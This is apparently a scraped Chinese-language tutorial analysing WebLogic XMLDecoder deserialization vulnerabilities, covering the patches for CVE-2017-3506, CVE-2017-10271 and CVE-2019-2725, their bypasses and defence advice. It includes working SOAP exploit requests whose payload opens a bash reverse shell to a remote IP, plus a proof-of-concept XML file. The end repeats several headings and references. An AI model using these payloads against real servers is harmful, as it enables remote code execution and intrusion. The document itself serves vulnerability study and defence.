WebLogic XMLDecoder反序列化漏洞深入分析与防御指南<\/h1>

一、XMLEncoder与XMLDecoder基础<\/h2>

1.1 XML序列化机制概述<\/h3>

XMLEncoder\/XMLDecoder是JDK1.4引入的XML格式序列化持久性方案：<\/p>

XMLEncoder：生成表示JavaBeans组件的XML文档<\/li>

XMLDecoder：读取XMLEncoder创建的XML文档获取JavaBeans<\/li> <\/ul>

1.2 基本使用示例<\/h3>

XMLEncoder示例代码<\/strong>：<\/p>

XMLEncoder e =<\/span> new<\/span> XMLEncoder(<\/span>new<\/span> BufferedOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"result.xml"<\/span>)));<\/span>
<\/span><\/span>e.<\/span>writeObject<\/span>(<\/span>new<\/span> JButton(<\/span>"Hello,xml"<\/span>));<\/span>
<\/span><\/span>e.<\/span>close<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>生成的XML文档<\/strong>：<\/p>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><java<\/span> version=<\/span>"1.8.0_181"<\/span> class=<\/span>"java.beans.XMLDecoder"<\/span>><\/span>
<\/span><\/span> <object<\/span> class=<\/span>"javax.swing.JButton"<\/span>><\/span>
<\/span><\/span>  <string><\/span>Hello,xml<\/string><\/span>
<\/span><\/span> <\/object><\/span>
<\/span><\/span><\/java><\/span>
<\/span><\/span><\/code><\/pre>XMLDecoder示例代码<\/strong>：<\/p>
XMLDecoder d =<\/span> new<\/span> XMLDecoder(<\/span>new<\/span> BufferedInputStream(<\/span>new<\/span> FileInputStream(<\/span>"result.xml"<\/span>)));<\/span>
<\/span><\/span>Object result =<\/span> d.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>result);<\/span>
<\/span><\/span>d.<\/span>close<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>二、XML标签与属性详解<\/h2>
2.1 核心标签解析<\/h3>


string标签<\/strong>：<\/p>

表示字符串值<\/li>
示例：<string>Hello,xml<\/string><\/code><\/li>
<\/ul>
<\/li>

object标签<\/strong>：<\/p>

表示对象实例<\/li>
class<\/code>属性指定具体类<\/li>
method<\/code>属性指定方法名（如构造函数用"new"）<\/li>
示例：
<object<\/span> class=<\/span>"javax.swing.JButton"<\/span> method=<\/span>"new"<\/span>><\/span>
<\/span><\/span>    <string><\/span>Hello,xml<\/string><\/span>
<\/span><\/span><\/object><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

void标签<\/strong>：<\/p>

表示函数调用或赋值操作<\/li>
method<\/code>属性指定方法名<\/li>
示例：
<object<\/span> class=<\/span>"javax.swing.JButton"<\/span>><\/span>
<\/span><\/span>    <void<\/span> method=<\/span>"setText"<\/span>><\/span>
<\/span><\/span>    <string><\/span>Hello,xml<\/string><\/span>
<\/span><\/span>    <\/void><\/span>
<\/span><\/span><\/object><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

array标签<\/strong>：<\/p>

表示数组<\/li>
class<\/code>属性指定数组类型<\/li>
length<\/code>属性指定长度<\/li>
内部void<\/code>标签的index<\/code>属性指定索引<\/li>
示例：
<array<\/span> class=<\/span>"java.lang.String"<\/span> length=<\/span>"3"<\/span>><\/span>
<\/span><\/span>    <void<\/span> index=<\/span>"1"<\/span>><\/span>
<\/span><\/span>    <string><\/span>Hello,xml<\/string><\/span>
<\/span><\/span>    <\/void><\/span>
<\/span><\/span><\/array><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
三、XMLDecoder反序列化漏洞原理<\/h2>
3.1 漏洞利用原理<\/h3>
通过构造恶意XML文档，XMLDecoder在反序列化时会执行其中的Java代码，导致任意代码执行。<\/p>
3.2 漏洞利用示例<\/h3>
恶意XML文档(poc.xml)<\/strong>：<\/p>
<java<\/span> version=<\/span>"1.4.0"<\/span> class=<\/span>"java.beans.XMLDecoder"<\/span>><\/span>
<\/span><\/span>    <void<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span>
<\/span><\/span>        <array<\/span> class=<\/span>"java.lang.String"<\/span> length=<\/span>"3"<\/span>><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"0"<\/span>><string><\/span>\/bin\/bash<\/string><\/void><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"1"<\/span>><string><\/span>-c<\/string><\/void><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"2"<\/span>><string><\/span>open -a Calculator<\/string><\/void><\/span>
<\/span><\/span>        <\/array><\/span>
<\/span><\/span>        <void<\/span> method=<\/span>"start"<\/span>\/><\/void><\/span>
<\/span><\/span><\/java><\/span>
<\/span><\/span><\/code><\/pre>等效Java代码<\/strong>：<\/p>
String[]<\/span> cmd =<\/span> new<\/span> String[<\/span>3<\/span>];<\/span>
<\/span><\/span>cmd[<\/span>0<\/span>]<\/span> =<\/span> "\/bin\/bash"<\/span>;<\/span>
<\/span><\/span>cmd[<\/span>1<\/span>]<\/span> =<\/span> "-c"<\/span>;<\/span>
<\/span><\/span>cmd[<\/span>2<\/span>]<\/span> =<\/span> "open \/System\/Applications\/Calculator.app\/"<\/span>;<\/span>
<\/span><\/span>new<\/span> ProcessBuilder(<\/span>cmd).<\/span>start<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>四、WebLogic漏洞复现与分析<\/h2>
4.1 漏洞复现步骤<\/h3>


环境搭建<\/strong>：<\/p>
version<\/span>: '2'<\/span>
<\/span><\/span>services<\/span>:
<\/span><\/span> weblogic<\/span>:
<\/span><\/span>   image<\/span>: vulhub\/weblogic<\/span>
<\/span><\/span>   ports<\/span>:
<\/span><\/span>    - "7001:7001"<\/span>
<\/span><\/span>    - "8453:8453"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

利用EXP<\/strong>：<\/p>
POST<\/span> \/wls-wsat\/CoordinatorPortType HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.50.145:7001<\/span>
<\/span><\/span>Content-type:<\/span> text\/xml<\/span>
<\/span><\/span>Content-Length:<\/span> 639<\/span>
<\/span><\/span>
<\/span><\/span><soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span>><\/span>
<\/span><\/span>  <soapenv:Header><\/span>
<\/span><\/span>    <work:WorkContext<\/span> xmlns:work=<\/span>"http:\/\/bea.com\/2004\/06\/soap\/workarea\/"<\/span>><\/span>
<\/span><\/span>      <java<\/span> version=<\/span>"1.4.0"<\/span> class=<\/span>"java.beans.XMLDecoder"<\/span>><\/span>
<\/span><\/span>        <void<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span>
<\/span><\/span>          <array<\/span> class=<\/span>"java.lang.String"<\/span> length=<\/span>"3"<\/span>><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"0"<\/span>><string><\/span>\/bin\/bash<\/string><\/void><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"1"<\/span>><string><\/span>-c<\/string><\/void><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"2"<\/span>><string><\/span>bash -i >&<\/span> \/dev\/tcp\/192.168.50.145\/4444 0>&<\/span>1<\/string><\/void><\/span>
<\/span><\/span>          <\/array><\/span>
<\/span><\/span>          <void<\/span> method=<\/span>"start"<\/span>\/><\/void><\/span>
<\/span><\/span>      <\/java><\/span>
<\/span><\/span>    <\/work:WorkContext><\/span>
<\/span><\/span>  <\/soapenv:Header><\/span>
<\/span><\/span>  <soapenv:Body\/><\/span>
<\/span><\/span><\/soapenv:Envelope><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.2 漏洞调用链分析<\/h3>
完整调用栈：<\/p>

weblogic.wsee.workarea.WorkContextXmlInputAdapter.readUTF<\/code><\/li>
weblogic.workarea.spi.WorkContextEntryImpl.readEntry<\/code><\/li>
weblogic.workarea.WorkContextLocalMap.receiveRequest<\/code><\/li>
weblogic.workarea.WorkContextMapImpl.receiveRequest<\/code><\/li>
weblogic.wsee.jaxws.workcontext.WorkContextServerTube.receive<\/code><\/li>
weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld<\/code><\/li>
weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest<\/code><\/li>
<\/ol>
关键点：XMLDecoder.readObject()<\/code>最终被调用执行恶意XML。<\/p>
五、漏洞补丁与绕过分析<\/h2>
5.1 CVE-2017-3506补丁<\/h3>
补丁在WorkContextXmlInputAdapter<\/code>中添加了validate验证：<\/p>
private<\/span> void<\/span> validate<\/span>(<\/span>InputStream is)<\/span> {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    parser.<\/span>parse<\/span>(<\/span>is,<\/span> new<\/span> DefaultHandler()<\/span> {<\/span>
<\/span><\/span>        public<\/span> void<\/span> startElement<\/span>(<\/span>String uri,<\/span> String localName,<\/span> String qName,<\/span> Attributes attributes)<\/span> {<\/span>
<\/span><\/span>            if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"object"<\/span>))<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> IllegalStateException(<\/span>"Invalid context type: object"<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    });<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>：将object<\/code>标签替换为void<\/code>标签。<\/p>
5.2 CVE-2017-10271补丁<\/h3>
加强的黑名单验证：<\/p>
if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"object"<\/span>))<\/span> {<\/span>
<\/span><\/span>    throw<\/span> new<\/span> IllegalStateException(<\/span>"Invalid element qName:object"<\/span>);<\/span>
<\/span><\/span>}<\/span> else<\/span> if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"new"<\/span>))<\/span> {<\/span>
<\/span><\/span>    throw<\/span> new<\/span> IllegalStateException(<\/span>"Invalid element qName:new"<\/span>);<\/span>
<\/span><\/span>}<\/span> else<\/span> if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"method"<\/span>))<\/span> {<\/span>
<\/span><\/span>    throw<\/span> new<\/span> IllegalStateException(<\/span>"Invalid element qName:method"<\/span>);<\/span>
<\/span><\/span>}<\/span> else<\/span> if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"void"<\/span>))<\/span> {<\/span>
<\/span><\/span>    \/\/ 只允许index属性
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.3 CVE-2019-2725绕过<\/h3>
利用_async<\/code>组件的反序列化功能，EXP示例：<\/p>
<soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span> 
<\/span><\/span>  xmlns:wsa=<\/span>"http:\/\/www.w3.org\/2005\/08\/addressing"<\/span>
<\/span><\/span>  xmlns:asy=<\/span>"http:\/\/www.bea.com\/async\/AsyncResponseService"<\/span>><\/span>
<\/span><\/span>  <soapenv:Header><\/span>
<\/span><\/span>    <work:WorkContext<\/span> xmlns:work=<\/span>"http:\/\/bea.com\/2004\/06\/soap\/workarea\/"<\/span>><\/span>
<\/span><\/span>      <java<\/span> version=<\/span>"1.4.0"<\/span> class=<\/span>"java.beans.XMLDecoder"<\/span>><\/span>
<\/span><\/span>        <void<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span>
<\/span><\/span>          <array<\/span> class=<\/span>"java.lang.String"<\/span> length=<\/span>"3"<\/span>><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"0"<\/span>><string><\/span>\/bin\/bash<\/string><\/void><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"1"<\/span>><string><\/span>-c<\/string><\/void><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"2"<\/span>><string><\/span>bash -i >&<\/span> \/dev\/tcp\/192.168.50.145\/4444 0>&<\/span>1<\/string><\/void><\/span>
<\/span><\/span>          <\/array><\/span>
<\/span><\/span>          <void<\/span> method=<\/span>"start"<\/span>\/><\/span> <\/void><\/span>
<\/span><\/span>      <\/java><\/span>
<\/span><\/span>    <\/work:WorkContext><\/span>
<\/span><\/span>  <\/soapenv:Header><\/span>
<\/span><\/span>  <soapenv:Body><\/span>
<\/span><\/span>    <asy:onAsyncDelivery\/><\/span>
<\/span><\/span>  <\/soapenv:Body><\/span>
<\/span><\/span><\/soapenv:Envelope><\/span>
<\/span><\/span><\/code><\/pre>5.4 其他绕过方式<\/h3>

使用class<\/code>标签构造类（受限于只能调用构造函数）<\/li>
利用二次反序列化链：

FileSystemXmlApplicationContext-RCE<\/li>
UnitOfWorkChangeSet-RCE<\/li>
ysoserial-jdk7u21-RCE<\/li>
JtaTransactionManager-JNDI注入<\/li>
<\/ul>
<\/li>
<\/ol>
六、防御建议<\/h2>

及时更新WebLogic补丁<\/li>
禁用不必要的组件（如wls-wsat）<\/li>
在网络边界限制访问WebLogic管理端口<\/li>
实施严格的输入验证<\/li>
使用安全产品监控异常行为<\/li>
<\/ol>
七、影响版本<\/h2>

WebLogic 10.3.6.0<\/li>
WebLogic 12.1.3.0<\/li>
WebLogic 12.2.1.0<\/li>
WebLogic 12.2.1.1<\/li>
WebLogic 12.2.1.2<\/li>
<\/ul>
八、参考资源<\/h2>

WebLogic XMLDecoder反序列化学习<\/a><\/li>
WebLogic XMLDecoder反序列化分析<\/a><\/li>
WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li>
WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li>
WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li>
<\/ol>

WebLogic XMLDecoder反序列化漏洞深入分析与防御指南<\/h1>

一、XMLEncoder与XMLDecoder基础<\/h2>

二、XML标签与属性详解<\/h2>

三、XMLDecoder反序列化漏洞原理<\/h2>

3.1 漏洞利用原理<\/h3> 通过构造恶意XML文档，XMLDecoder在反序列化时会执行其中的Java代码，导致任意代码执行。<\/p>

四、WebLogic漏洞复现与分析<\/h2>

八、参考资源<\/h2> WebLogic XMLDecoder反序列化学习<\/a><\/li> WebLogic XMLDecoder反序列化分析<\/a><\/li> WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li> WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li> WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li> <\/ol>

3.1 漏洞利用原理<\/h3>
通过构造恶意XML文档，XMLDecoder在反序列化时会执行其中的Java代码，导致任意代码执行。<\/p>

八、参考资源<\/h2>

WebLogic XMLDecoder反序列化学习<\/a><\/li>
WebLogic XMLDecoder反序列化分析<\/a><\/li>
WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li>
WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li>
WebLogic XMLDecoder反序列化漏洞分析<\/a><\/li> <\/ol>